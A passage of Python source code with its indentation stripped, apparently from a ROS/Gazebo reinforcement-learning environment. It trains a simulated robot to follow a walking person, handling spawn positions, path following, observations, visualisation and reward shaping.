for angle_robot_person in [x for x in range(0, 360, 90)]:
path_angle = path.copy()
angle_from_person = np.deg2rad(angle) + angle_person
angle_person_robot = np.deg2rad(angle_robot_person) + angle_person
path_angle['start_robot']['pos'] = (path_angle['start_person']['pos'][0] + math.cos(angle_from_person)*2, path_angle['start_person']['pos'][1] + math.sin(angle_from_person)*2)
path_angle['start_robot']['orientation'] = angle_person_robot
path_angle['name'] = path['name'] + " " + str(angle) +" " + str(angle_robot_person)
self.paths.append(path_angle)
self.path_idx = -1
self.path = self.paths[self.path_idx]
except Exception as e:
print("error happend in writing {}".format(e))
self.agent_num = agent_num
self.state_cb_prev_time = None
self.model_states_sub = rospy.Subscriber("/gazebo/model_states", ModelStates, self.model_states_cb)
with self.lock:
self.init_simulator()
def model_states_cb(self, states_msg):
for model_idx in range(len(states_msg.name)):
found = False
for robot in [self.robot, self.person]:
if states_msg.name[model_idx] == robot.name:
found = True
break
if not found:
continue
pos = states_msg.pose[model_idx]
euler = quat2euler(pos.orientation.x, pos.orientation.y, pos.orientation.z, pos.orientation.w)
orientation = euler[0]
fall_angle = np.deg2rad(90)
if abs(abs(euler[1]) - fall_angle)< 0.1 or abs(abs(euler[2]) - fall_angle)<0.1:
self.fallen = True
# get velocity
twist = states_msg.twist[model_idx]
linear_vel = twist.linear.x
angular_vel = twist.angular.z
pos_x = pos.position.x
pos_y = pos.position.y
state = {}
state["velocity"] = (linear_vel, angular_vel)
state["position"] = (pos_x, pos_y)
state["orientation"] = orientation
robot.set_state(state)
if self.use_movebase and robot.name == self.person.name:
obstacle_msg_array = ObstacleArrayMsg()
obstacle_msg_array.header.stamp = rospy.Time.now()
obstacle_msg_array.header.frame_id = "tb3_{}/odom".format(self.agent_num)
obstacle_msg = ObstacleMsg()
obstacle_msg.header = obstacle_msg_array.header
obstacle_msg.id = 0
for x in range (5):
for y in range (5):
point = Point32()
point.x = pos.position.x + (x-2)*0.1
point.y = pos.position.y + (y-2)*0.1
point.z = pos.position.z
obstacle_msg.polygon.points.append(point)
obstacle_msg.orientation.x = pos.orientation.x
obstacle_msg.orientation.y = pos.orientation.y
obstacle_msg.orientation.z = pos.orientation.z
obstacle_msg.orientation.w = pos.orientation.w
obstacle_msg.velocities.twist.linear.x = twist.linear.x
obstacle_msg.velocities.twist.angular.z = twist.linear.z
obstacle_msg_array.obstacles.append(obstacle_msg)
self.obstacle_pub_.publish(obstacle_msg_array)
def create_robots(self):
self.person = Robot('person_{}'.format(self.agent_num),
max_angular_speed=1, max_linear_speed=.6, agent_num=self.agent_num, window_size=self.window_size, is_testing=self.is_testing)
relative = self.person
if self.use_goal:
relative = self.person
self.robot = Robot('tb3_{}'.format(self.agent_num),
max_angular_speed=1.8, max_linear_speed=0.8, relative=relative, agent_num=self.agent_num, use_goal=self.use_goal, use_movebase=self.use_movebase ,use_jackal=self.use_jackal, window_size=self.window_size, is_testing=self.is_testing)
def find_random_point_in_circle(self, radious, min_distance, around_point):
max_r = 2
r = (radious - min_distance) * math.sqrt(random.random()) + min_distance
theta = random.random() * 2 * math.pi
x = around_point[0] + r * math.cos(theta)
y = around_point[1] + r * math.sin(theta)
return (x, y)
def set_mode_person_based_on_episode_number(self, episode_number):
if episode_number < 500:
self.mode_person = 0
elif episode_number < 510:
self.mode_person = 1
elif episode_number < 700:
self.mode_person = 3
elif episode_number < 900:
self.mode_person = 5
elif episode_number < 1000:
self.mode_person = 6
else:
#self.mode_person = 7
if random.random()>0.5:
self.mode_person = 7
else:
self.mode_person = random.randint(0, 6)
def get_init_pos_robot_person(self):
if self.is_evaluation_:
idx_start = 0
elif self.is_use_test_setting:
idx_start = self.path_follower_test_settings[self.path_follower_current_setting_idx][1]
else:
idx_start = random.randint(0, len(self.path["points"]) - 20)
self.current_path_idx = idx_start
if not self.is_use_test_setting and self.use_reverse and random.random() > 0.5:
self.path["points"].reverse()
if self.is_evaluation_:
init_pos_person = self.path["start_person"]
init_pos_robot = self.path["start_robot"]
elif self.is_use_test_setting and not self.path_follower_test_settings[self.path_follower_current_setting_idx][3]:
init_pos_person = {"pos": (0, 0), "orientation":0}
mode = self.path_follower_test_settings[self.path_follower_current_setting_idx][1]
if mode == 0:
orinetation_person_rob = 0
elif mode == 1:
orinetation_person_rob = -math.pi /4.
elif mode == 2:
orinetation_person_rob = math.pi /4.
elif mode == 3:
orinetation_person_rob = -math.pi
else:
orinetation_person_rob = math.pi/8*7
pos_robot = (1.5*math.cos(orinetation_person_rob), 1.5*math.sin(orinetation_person_rob))
init_pos_robot = {"pos": pos_robot, "orientation":0}
elif not self.use_path:
init_pos_person = {"pos": (0, 0), "orientation": random.random()*2*math.pi - math.pi}
ahead_person = (init_pos_person['pos'][0] + math.cos(init_pos_person["orientation"]) * 2, init_pos_person['pos'][1] + math.sin(init_pos_person["orientation"]) * 2)
random_pos_robot = self.find_random_point_in_circle(1.5, 2.5, init_pos_person["pos"])
init_pos_robot = {"pos": random_pos_robot,\
"orientation": init_pos_person["orientation"]}#random.random()*2*math.pi - math.pi}#self.calculate_angle_using_path(idx_start)}
elif self.use_random_around_person_:
init_pos_person = {"pos": self.path["points"][idx_start], "orientation": self.calculate_angle_using_path(idx_start)}
init_pos_robot = {"pos": self.find_random_point_in_circle(1.5, 1, self.path["points"][idx_start]),\
"orientation": random.random()*2*math.pi - math.pi}#self.calculate_angle_using_path(idx_start)}
else:
init_pos_person = {"pos": self.path["points"][idx_start], "orientation": self.calculate_angle_using_path(idx_start)}
if self.is_use_test_setting and len(self.path_follower_test_settings[self.path_follower_current_setting_idx])>4 and self.path_follower_test_settings[self.path_follower_current_setting_idx][4] :
orinetation_person_rob = math.pi/2.2
pos_robot = (self.path["points"][idx_start][0] + 2*math.cos(orinetation_person_rob+init_pos_person["orientation"]), self.path["points"][idx_start][1] + 2*math.sin(orinetation_person_rob+init_pos_person["orientation"]))
init_pos_robot = {"pos": pos_robot, "orientation":self.calculate_angle_using_path(idx_start+5)}
else:
idx_robot = idx_start + 1
while (math.hypot(self.path["points"][idx_robot][1] - self.path["points"][idx_start][1],
self.path["points"][idx_robot][0] - self.path["points"][idx_start][0]) < 1.6):
idx_robot += 1
init_pos_robot = {"pos": self.path["points"][idx_robot],\
"orientation": self.calculate_angle_using_path(idx_robot)}
if not self.is_testing:
init_pos_robot["pos"] = (init_pos_robot["pos"][0]+ random.random()-0.5, \
init_pos_robot["pos"][1]+ random.random()-0.5)
init_pos_robot["orientation"] = GazeborosEnv.wrap_pi_to_pi(init_pos_robot["orientation"] + random.random()-0.5)
return init_pos_robot, init_pos_person
def set_pos(self, name, pose):
set_model_msg = ModelState()
set_model_msg.model_name = name
self.prev_action = (0,0)
quaternion_rotation = euler2quat(0, pose["orientation"], 0)
set_model_msg.pose.orientation.x = quaternion_rotation[3]
set_model_msg.pose.orientation.y = quaternion_rotation[1]
set_model_msg.pose.orientation.z = quaternion_rotation[2]
set_model_msg.pose.orientation.w = quaternion_rotation[0]
if self.use_jackal and "tb3" in name:
set_model_msg.pose.position.z = 2.6 * self.agent_num + 0.1635
else:
set_model_msg.pose.position.z = 2.6 * self.agent_num + 0.099
set_model_msg.pose.position.x = pose["pos"][0]
set_model_msg.pose.position.y = pose["pos"][1]
rospy.wait_for_service('/gazebo/set_model_state')
self.set_model_state_sp(set_model_msg)
def init_simulator(self):
self.number_of_steps = 0
rospy.loginfo("init simulation called")
self.is_pause = True
init_pos_robot, init_pos_person = self.get_init_pos_robot_person()
self.center_pos_ = init_pos_person["pos"]
self.color_index = 0
self.fallen = False
self.is_max_distance = False
self.first_call_observation = True
self.current_obsevation_image_.fill(255)
if self.use_movebase:
self.robot.movebase_cancel_goals()
rospy.sleep(0.5)
self.person.stop_robot()
self.robot.stop_robot()
# if self.use_movebase:
# self.prev_action = (0,0, 0)
# else:
self.prev_action = (0,0)
self.set_pos(self.robot.name, init_pos_robot)
self.set_pos(self.person.name, init_pos_person)
self.robot.update(init_pos_robot)
self.person.update(init_pos_person)
self.path_finished = False
self.position_thread = threading.Thread(target=self.path_follower, args=(self.current_path_idx, self.robot,))
self.position_thread.daemon = True
self.is_reseting = False
self.position_thread.start()
self.wait_observation_ = 0
self.is_reseting = False
self.robot.reset = False
self.person.reset = False
# self.resume_simulator()
rospy.loginfo("init simulation finished")
self.is_pause = False
def pause(self):
self.is_pause = True
self.person.pause()
self.robot.pause()
def resume_simulator(self):
rospy.loginfo("resume simulator")
self.is_pause = False
self.person.resume()
self.robot.resume()
rospy.loginfo("resumed simulator")
def calculate_angle_using_path(self, idx):
return math.atan2(self.path["points"][idx+1][1] - self.path["points"][idx][1], self.path["points"][idx+1][0] - self.path["points"][idx][0])
@staticmethod
def denormalize(value, max_val):
if type(value) == tuple or type(value) == list:
norm_val = [float(x) * max_val for x in value]
else:
norm_val = value * float(max_val)
return norm_val
@staticmethod
def normalize(value, max_val, zero_to_one=None):
if type(value) == tuple or type(value) == list:
norm_val = [x/float(max_val) for x in value]
else:
norm_val = value/float(max_val)
if zero_to_one is not None:
if type(value) == tuple or type(value) == list:
norm_val = [(x + 1)/2 for x in norm_val]
else:
norm_val = (norm_val + 1)/2.
return norm_val
@staticmethod
def get_global_position(pos_goal, center):
while not center.is_current_state_ready():
if center.reset:
rospy.logwarn("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.01)
rospy.logwarn ("waiting for observation to be ready")
#relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
#pos = [x * 5 for x in pos_goal]
relative_pos = np.asarray(pos_goal)
# transform the relative to center coordinat
rotation_matrix = np.asarray([[np.cos(center_orientation), np.sin(center_orientation)], [-np.sin(center_orientation), np.cos(center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
global_pos = np.asarray(relative_pos + center_pos)
return global_pos
@staticmethod
def get_global_position_orientation(pos_goal, orientation_goal, center):
while not center.is_current_state_ready():
if center.reset:
rospy.logwarn("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.01)
rospy.logwarn ("waiting for observation to be ready")
#relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
#pos = [x * 5 for x in pos_goal]
relative_pos = np.asarray(pos_goal)
relative_pos2 = np.asarray((relative_pos[0] +math.cos(orientation_goal) , relative_pos[1] + math.sin(orientation_goal)))
# transform the relative to center coordinat
rotation_matrix = np.asarray([[np.cos(center_orientation), np.sin(center_orientation)], [-np.sin(center_orientation), np.cos(center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
relative_pos2 = np.matmul(relative_pos2, rotation_matrix)
global_pos = np.asarray(relative_pos + center_pos)
global_pos2 = np.asarray(relative_pos2 + center_pos)
new_orientation = np.arctan2(global_pos2[1]-global_pos[1], global_pos2[0]-global_pos[0])
return global_pos, new_orientation
@staticmethod
def wrap_pi_to_pi(angle):
while angle > math.pi:
angle -= 2*math.pi
while angle < - math.pi:
angle += 2*math.pi
return angle
@staticmethod
def get_relative_heading_position(relative, center):
while not relative.is_current_state_ready() or not center.is_current_state_ready():
if relative.reset:
rospy.logwarn("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.1)
rospy.loginfo ("waiting for observation to be ready heading pos")
relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
# transform the relative to center coordinat
relative_pos = np.asarray(relative.state_['position'] - center_pos)
relative_pos2 = np.asarray((relative_pos[0] +math.cos(relative_orientation) , relative_pos[1] + math.sin(relative_orientation)))
rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
relative_pos2 = np.matmul(relative_pos2, rotation_matrix)
angle_relative = np.arctan2(relative_pos2[1]-relative_pos[1], relative_pos2[0]-relative_pos[0])
return -angle_relative, relative_pos
@staticmethod
def get_relative_position(pos, center):
while not center.is_current_state_ready():
if center.reset:
rospy.loginfo("reseting so return none in rel pos rel: {} center".format(relative.is_current_state_ready(), center.is_current_state_ready()))
return (None, None)
time.sleep(0.01)
rospy.loginfo("waiting for observation to be ready relative pos")
#relative_orientation = relative.state_['orientation']
center_pos = np.asarray(center.state_['position'])
center_orientation = center.state_['orientation']
relative_pos = np.asarray(pos)
# transform the relative to center coordinat
relative_pos = np.asarray(relative_pos - center_pos)
rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])
relative_pos = np.matmul(relative_pos, rotation_matrix)
return relative_pos
def set_robot_to_auto(self):
self.robot_mode = 1
"""
the function will check the self.robot_mode:
0: will not move robot
1: robot will try to go to a point after person
"""
def path_follower(self, idx_start, robot):
counter = 0
while self.is_pause:
if self.is_reseting:
rospy.loginfo( "path follower return as reseting ")
return
time.sleep(0.001)
if counter > 10000:
rospy.loginfo( "path follower waiting for pause to be false")
counter = 0
counter += 1
rospy.loginfo( "path follower waiting for lock pause:{} reset:{}".format(self.is_pause, self.is_reseting))
if self.lock.acquire(timeout=10):
rospy.sleep(1.5)
rospy.loginfo("path follower got the lock")
if self.is_use_test_setting:
mode_person = self.path_follower_test_settings[self.path_follower_current_setting_idx][0]
elif self.test_simulation_:
mode_person = -1
elif self.is_evaluation_:
mode_person = 2
elif self.use_predifined_mode_person:
mode_person = self.mode_person
else:
mode_person = random.randint(0, 7)
#if self.agent_num == 2:
# mode_person = random.randint(1, self.max_mod_person_)
#else:
# mode_person = 0
# if self.agent_num == 0:
# mode_person = 5
# elif self.agent_num == 1:
# mode_person = 2
# elif self.agent_num == 2:
# mode_person = 3
# elif self.agent_num == 3:
# mode_person = 7
# else:
# mode_person = random.randint(1, self.max_mod_person_)
# if mode_person == 0:
# person_thread = threading.Thread(target=self.person.go_to_goal, args=())
# person_thread.start()
if self.use_goal and not self.use_movebase:
self.robot_thread = threading.Thread(target=self.robot.go_to_goal, args=())
self.robot_thread.start()
for idx in range (idx_start, len(self.path["points"])-3):
point = (self.path["points"][idx][0], self.path["points"][idx][1])
self.current_path_idx = idx
counter_pause = 0
while self.is_pause:
counter_pause+=1
rospy.loginfo("pause in path follower")
if self.is_reseting or counter_pause > 200:
# if mode_person == 0:
# person_thread.join()
self.lock.release()
return
time.sleep(0.001)
try:
if mode_person <= 6:
self.person.use_selected_person_mod(mode_person)
else:
self.person.go_to_pos(point, stop_after_getting=True)
time.sleep(0.001)
# person_thread.start()
# if self.robot_mode == 1:
# noisy_point = (self.path["points"][idx+3][0] +min(max(np.random.normal(),-0.5),0.5), self.path["points"][idx+3][1] +min(max(np.random.normal(),-0.5),0.5))
# robot_thread = threading.Thread(target=self.robot.go_to_pos, args=(noisy_point,True,))
# robot_thread.start()
# robot_thread.join()
# person_thread.join()
except Exception as e:
rospy.logerr("path follower {}, {}".format(self.is_reseting, e))
traceback.print_exc()
break
if self.is_reseting:
self.person.stop_robot()
break
self.lock.release()
rospy.loginfo("path follower release the lock")
self.path_finished = True
else:
rospy.loginfo("problem in getting the log in path follower")
# robot.stop_robot()
def get_laser_scan(self):
return self.robot.get_laser_image()
def get_laser_scan_all(self):
images = self.robot.scan_image_history.get_elemets()
counter = 0
while len(images)!=self.robot.scan_image_history.window_size and counter<250:
images = self.robot.scan_image_history.get_elemets()
time.sleep(0.005)
counter +=1
if counter > 100:
rospy.loginfo("wait for laser scan to get filled sec: {}/25".format(counter / 10))
if counter>=250:
raise RuntimeError(
'exception while calling get_laser_scan:')
images = np.asarray(images)
return (images.reshape((images.shape[1], images.shape[2], images.shape[0])))
def get_observation(self):
# got_laser = False
# while not got_laser:
# try:
# laser_all = self.get_laser_scan_all()
# got_laser = True
# except Exception as e:
# rospy.logerr("laser_error reseting")
# # self.reset(reset_gazebo = True)
while self.robot.pos_history.avg_frame_rate is None or self.person.pos_history.avg_frame_rate is None or self.robot.velocity_history.avg_frame_rate is None or self.person.velocity_history.avg_frame_rate is None:
if self.is_reseting:
return None
time.sleep(0.001)
pos_his_robot = np.asarray(self.robot.pos_history.get_elemets())
heading_robot = self.robot.state_["orientation"]
pos_his_person = np.asarray(self.person.pos_history.get_elemets())
heading_person = self.person.state_["orientation"]
robot_vel = np.asarray(self.robot.get_velocity())
person_vel = np.asarray(self.person.get_velocity())
poses = np.concatenate((pos_his_robot, pos_his_person))
if self.use_noise:
poses += np.random.normal(loc=0, scale=0.1, size=poses.shape)
heading_robot += np.random.normal(loc=0, scale=0.2)
heading_person += np.random.normal(loc=0, scale=0.2)
robot_vel += np.random.normal(loc=0, scale=0.1, size=robot_vel.shape)
person_vel += np.random.normal(loc=0, scale=0.1, size=person_vel.shape)
heading_relative = GazeborosEnv.wrap_pi_to_pi(heading_robot-heading_person)/(math.pi)
pos_rel = []
for pos in (poses):
relative = GazeborosEnv.get_relative_position(pos, self.robot.relative)
pos_rel.append(relative)
pos_history = np.asarray(np.asarray(pos_rel)).flatten()/6.0
#TODO: make the velocity normalization better
velocities = np.concatenate((person_vel, robot_vel))/self.robot.max_angular_vel
if self.use_orientation_in_observation:
velocities_heading = np.append(velocities, heading_relative)
else:
velocities_heading = velocities
final_ob = np.append(np.append(pos_history, velocities_heading), self.prev_action)
return final_ob
def __del__(self):
# todo
return
def visualize_observation(self):
observation_image = np.zeros([2000,2000,3])
observation_image_gt = np.zeros([2000,2000,3])
observation_image = observation_image.astype(np.uint8)
observation_image_gt = observation_image_gt.astype(np.uint8)
observation_image.fill(255)
observation_image_gt.fill(255)
while self.robot.pos_history.avg_frame_rate is None or self.person.pos_history.avg_frame_rate is None or self.robot.velocity_history.avg_frame_rate is None or self.person.velocity_history.avg_frame_rate is None:
if self.is_reseting:
return None
time.sleep(0.001)
pos_his_robot = self.robot.pos_history.get_elemets()
heading_robot = self.robot.state_["orientation"]
pos_his_person = self.person.pos_history.get_elemets()
heading_person = self.person.state_["orientation"]
heading_relative = GazeborosEnv.wrap_pi_to_pi(heading_robot-heading_person)/(math.pi)
center_pos = pos_his_robot[-1]
for pos in pos_his_robot:
relative = GazeborosEnv.get_relative_position(pos, self.robot)
pos_rel = GazeborosEnv.to_image_coordinate(relative, (0, 0))
pos_gt = GazeborosEnv.to_image_coordinate(pos, center_pos)
observation_image = self.add_circle_observation_to_image(relative, (255, 0, 0), 10, center_pos=(0,0), image=observation_image)
observation_image_gt = self.add_circle_observation_to_image(pos, (255, 0, 0), 10, center_pos=center_pos, image=observation_image_gt)
for pos in pos_his_person:
relative = GazeborosEnv.get_relative_position(pos, self.robot)
pos_rel = GazeborosEnv.to_image_coordinate(relative, (0, 0))
pos_gt = GazeborosEnv.to_image_coordinate(pos, center_pos)
observation_image = self.add_circle_observation_to_image(relative, (0, 255, 0), 10, image = observation_image, center_pos=(0,0))
observation_image_gt = self.add_circle_observation_to_image(pos, (0, 255, 0), 10, image=observation_image_gt, center_pos=center_pos)
self.image_pub.publish(self.bridge.cv2_to_imgmsg(observation_image, encoding="bgr8"))
self.image_pub_gt.publish(self.bridge.cv2_to_imgmsg(observation_image_gt, encoding="bgr8"))
@staticmethod
def to_image_coordinate(pos, center_pos):
return (int((pos[0] - center_pos[0])*50+1000), int((pos[1] - center_pos[1])*50+1000))
def add_line_observation_to_image(self, pos, pos2):
color = self.colors_visualization[self.color_index]
pos_image = GazeborosEnv.to_image_coordinate(pos, self.center_pos_)
pos_image2 = GazeborosEnv.to_image_coordinate(pos2, self.center_pos_)
if pos_image[0] >2000 or pos_image[0] < 0 or pos_image[1] >2000 or pos_image[1] < 0:
rospy.logerr("problem with observation: {}".format(pos_image))
return
self.new_obsevation_image_ = cv.line(self.new_obsevation_image_, (pos_image[0], pos_image[1]), (pos_image2[0], pos_image2[1]), color, 1)
def add_triangle_observation_to_image(self, pos, orientation):
color = self.colors_visualization[self.color_index]
pos_image = GazeborosEnv.to_image_coordinate(pos, self.center_pos_)
pos_triangle1 = GazeborosEnv.to_image_coordinate((pos[0]+math.cos(orientation)*0.3, pos[1]+math.sin(orientation)*0.3), self.center_pos_)
pos_triangle2 = GazeborosEnv.to_image_coordinate((pos[0]+math.cos(orientation+math.pi/2)*0.1, pos[1]+math.sin(orientation+math.pi/2)*0.1), self.center_pos_)
pos_triangle3 = GazeborosEnv.to_image_coordinate((pos[0]+math.cos(orientation-math.pi/2)*0.1, pos[1]+math.sin(orientation-math.pi/2)*0.1), self.center_pos_)
poses = [pos_triangle1, pos_triangle2, pos_triangle3]
print(poses)
for pos in poses:
if pos[0] >2000 or pos[0] < 0 or pos[1] >2000 or pos[1] < 0:
rospy.logerr("problem with observation: {}".format(pos))
return
self.new_obsevation_image_ = cv.drawContours(self.new_obsevation_image_, [np.asarray(poses)], 0, color, -1)
def add_arrow_observation_to_image(self, pos, orientation):
color = self.colors_visualization[self.color_index]
pos_image = GazeborosEnv.to_image_coordinate(pos, self.center_pos_)
pos_image2 = GazeborosEnv.to_image_coordinate((pos[0]+math.cos(orientation)*0.3, pos[1]+math.sin(orientation)*0.3), self.center_pos_)
if pos_image[0] >2000 or pos_image[0] < 0 or pos_image[1] >2000 or pos_image[1] < 0:
rospy.logerr("problem with observation: {}".format(pos_image))
return
self.new_obsevation_image_ = cv.arrowedLine(self.new_obsevation_image_, (pos_image[0], pos_image[1]), (pos_image2[0], pos_image2[1]), color, 2, tipLength=0.5)
def add_circle_observation_to_image(self, pos, color, radious, center_pos=None, image=None):
if image is None:
image = self.new_obsevation_image_
if center_pos is None:
center_pos = self.center_pos_
pos_image = GazeborosEnv.to_image_coordinate(pos, center_pos)
if pos_image[0] >2000 or pos_image[0] < 0 or pos_image[1] >2000 or pos_image[1] < 0:
rospy.logerr("problem with observation: {}".format(pos_image))
return
return (cv.circle(image , (pos_image[0], pos_image[1]), radious, color, 2))
def get_supervised_action(self):
while not self.person.is_current_state_ready() and not self.is_reseting:
time.sleep(0.1)
if self.is_reseting:
return np.asarray([0,0])
self.use_supervise_action = True
pos = self.person.calculate_ahead(1.5)
pos_person = self.person.get_pos()
pos_relative = GazeborosEnv.get_relative_position(pos, self.robot.relative)
pos_person_relative = GazeborosEnv.get_relative_position(pos_person, self.robot.relative)
print (f"pos pos_person pos_relative [pos], [pos_person] [pos_relative]")
pos_norm = GazeborosEnv.normalize(pos_relative, self.robot.max_rel_pos_range)
orientation = GazeborosEnv.normalize(math.atan2(pos_relative[1] - pos_person_relative[1], pos_relative[0] - pos_person_relative[0]), math.pi)
return np.asarray((pos_norm[0], pos_norm[1], orientation))
def update_observation_image(self):
self.new_obsevation_image_ = np.copy(self.current_obsevation_image_)
robot_pos = self.robot.get_pos()
robot_orientation = self.robot.get_orientation()
person_pos = self.person.get_pos()
person_orientation = self.person.get_orientation()
if self.use_goal:
current_goal = self.robot.get_goal()
if person_orientation is None or robot_orientation is None:
rospy.logerr("person or robot orientation is None")
return
if self.first_call_observation:
# self.new_obsevation_image_ = self.add_circle_observation_to_image(robot_pos, [152,100,100], 10)
# self.new_obsevation_image_ = self.add_circle_observation_to_image(person_pos,[0,100,100], 10)
self.first_call_observation = False
if self.is_collided():
self.new_obsevation_image_ = self.add_circle_observation_to_image(robot_pos, [152,200,200], 10)
self.new_obsevation_image_ = self.add_circle_observation_to_image(person_pos,[200,100,100], 10)
self.add_arrow_observation_to_image(robot_pos, robot_orientation)
self.add_triangle_observation_to_image(person_pos, person_orientation)
if self.use_goal:
if self.use_movebase:
goal_orientation = current_goal["orientation"]
else:
goal_orientation = robot_orientation
self.add_circle_observation_to_image(current_goal["pos"], self.colors_visualization[self.color_index], 5)
#self.add_line_observation_to_image(robot_pos, current_goal["pos"])
else:
self.add_line_observation_to_image(robot_pos, person_pos)
alpha = 0.50
self.current_obsevation_image_ = cv.addWeighted(self.new_obsevation_image_, alpha, self.current_obsevation_image_, 1 - alpha, 0)
def get_current_observation_image(self):
image = self.current_obsevation_image_
image = image/255.
if self.is_testing:
self.save_current_path()
return image
def take_action(self, action):
self.prev_action = action[:2]
self.robot.take_action(action)
if self.wait_observation_ <= 0:
self.update_observation_image()
self.wait_observation_ = 7
self.color_index += 2
if self.color_index >= len(self.colors_visualization):
self.color_index = len(self.colors_visualization) - 1
self.wait_observation_ -= 1
return
def is_skip_run(self):
if self.fallen:
return True
else:
return False
def is_successful(self):
if self.is_collided() or self.is_max_distance or self.fallen:
return False
else:
return True
def step(self, action):
self.number_of_steps += 1
self.take_action(action)
# instead of one reward get all the reward during wait
# rospy.sleep(0.4)
sleep_time = 0.10
rewards = []
if sleep_time > 0.1:
for t in range (10):
rospy.sleep(sleep_time/10.)
rewards.append(self.get_reward())
reward = np.mean(rewards)
else:
rospy.sleep(sleep_time)
reward = self.get_reward()
ob = self.get_observation()
episode_over = False
rel_person = GazeborosEnv.get_relative_heading_position(self.robot, self.person)[1]
distance = math.hypot(rel_person[0], rel_person[1])
if self.path_finished:
rospy.loginfo("path finished")
episode_over = True
if self.is_collided():
self.update_observation_image()
episode_over = True
rospy.loginfo('collision happened episode over')
reward -= 0.5
elif distance > 5:
self.update_observation_image()
self.is_max_distance = True
episode_over = True
rospy.loginfo('max distance happened episode over')
elif self.number_of_steps > self.max_numb_steps:
self.update_observation_image()
episode_over = True
if self.fallen:
episode_over = True
rospy.loginfo('fallen')
reward = min(max(reward, -1), 1)
if self.agent_num == 0:
rospy.loginfo("action {} reward {}".format(action, reward))
if episode_over:
self.person.reset = True
#reward += 1
return ob, reward, episode_over, {}
def is_collided(self):
rel_person = GazeborosEnv.get_relative_heading_position(self.robot, self.person)[1]
distance = math.hypot(rel_person[0], rel_person[1])
if distance < self.collision_distance or self.robot.is_collided:
return True
return False
def get_distance(self):
_, pos_rel = GazeborosEnv.get_relative_heading_position(self.robot, self.person)
return math.hypot(pos_rel[0],pos_rel[1])
def get_angle_person_robot(self):
_, pos_rel = GazeborosEnv.get_relative_heading_position(self.robot, self.person)
angle_robot_person = math.atan2(pos_rel[1], pos_rel[0])
return (GazeborosEnv.wrap_pi_to_pi(angle_robot_person))
def get_reward(self):
reward = 0
angle_robot_person, pos_rel = GazeborosEnv.get_relative_heading_position(self.robot, self.person)
angle_robot_person = math.atan2(pos_rel[1], pos_rel[0])
angle_robot_person = np.rad2deg(GazeborosEnv.wrap_pi_to_pi(angle_robot_person))
distance = math.hypot(pos_rel[0], pos_rel[1])
# Negative reward for being behind the person
if self.is_collided():
reward -= 1
if distance < 0.5:
reward = -1.3
elif abs(distance - self.best_distance) < 0.5:
reward += 0.5 * (0.5 - abs(distance - self.best_distance))
elif distance >= self.best_distance+0.5:
reward -= 0.25 * (distance - (self.best_distance+0.5))
elif distance < self.best_distance-0.5:
reward -= (self.best_distance - 0.5 - distance)/(self.best_distance - 0.5)
if abs(angle_robot_person) < 25:
reward += 0.5 * (25 - abs(angle_robot_person)) / 25
else:
reward -= 0.25 * abs(angle_robot_person) / 180
if abs(distance - self.best_distance) < 0.5 and abs(angle_robot_person) < 25:
reward += 0.25
# if not 90 > angle_robot_person > 0:
# reward -= distance/6.0
# elif self.min_distance < distance < self.max_distance:
# reward += 0.1 + (90 - angle_robot_person) * 0.9 / 90
# elif distance < self.min_distance:
# reward -= 1 - distance / self.min_distance
# else:
# reward -= distance / 7.0
reward = min(max(reward, -1), 1)
# ToDO check for obstacle
return reward
def save_log(self):
pickle.dump({"person_history":self.person.log_history, "robot_history":self.robot.log_history}, self.log_file)
self.log_file.close()
def reset(self, reset_gazebo=False):
self.is_pause = True
self.is_reseting = True
self.robot.reset = True
self.person.reset = True
rospy.loginfo("trying to get the lock for reset")
# if reset_gazebo:
# self.reset_gazebo()
with self.lock:
rospy.loginfo("got the lock")
not_init = True
try:
if self.is_evaluation_:
if self.log_file is not None:
pickle.dump({"person_history":self.person.log_history, "robot_history":self.robot.log_history}, self.log_file)
self.log_file.close()
self.path_idx += 1
print ("start path_id: {}".format(self.path_idx))
if self.path_idx < len(self.paths)-1:
self.path = self.paths[self.path_idx]
self.log_file = open(self.path["name"], "wb")
else:
print ("all done")
self.person.stop_robot()
exit(0)
self.init_simulator()
not_init = False
except RuntimeError as e:
rospy.logerr("error happend reseting: {}".format(e))
if not_init:
rospy.loginfo("not init so run reset again")
return (self.reset())
else:
rospy.sleep(2)
return self.get_observation()
def save_current_path(self):
all_pos_robot = self.robot.all_pose_
all_pos_person = self.person.all_pose_
directory = "data/traj_simulations"
name = ""
if self.use_goal:
if self.use_supervise_action:
name += "base_"
else:
name += "planner_"
else:
name += "cmd_"
name += self.path_follower_test_settings[self.path_follower_current_setting_idx][2]
if not os.path.exists(directory):
os.makedirs(directory)
with open(os.path.join(directory, name + ".pkl") , "wb") as f:
pickle.dump({"robot":all_pos_robot, "person":all_pos_person, "name":name}, f)
self.robot.all_pose_ = []
self.person.all_pose_ = []
def next_setting(self):
self.path_follower_current_setting_idx += 1
def is_finish(self):
if self.path_follower_current_setting_idx >= len(self.path_follower_test_settings)-1:
return True
return False
def render(self, mode='human', close=False):
""" Viewer only supports human mode currently. """
return
def calculate_rechability_derivite(self, x, y, v, theta):
get_idx = lambda x: int(math.floor(x))
pos_norm = GazeborosEnv.normalize((x, y), self.robot.max_rel_pos_range, True)
orientation_norm = GazeborosEnv.normalize(theta, math.pi, True)
velocity_norm = GazeborosEnv.normalize(v, self.robot.max_linear_vel, True)
x_idx = get_idx(pos_norm[0]*(self.reachabilit_value.shape[0]-1))
y_idx = get_idx(pos_norm[1]*(self.reachabilit_value.shape[1]-1))
orientation_idx = get_idx(orientation_norm * (self.reachabilit_value.shape[3] -1))
